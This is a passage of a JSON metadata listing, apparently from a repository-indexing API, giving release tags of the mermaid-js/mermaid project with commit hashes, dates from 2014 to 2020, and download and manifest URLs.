88afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"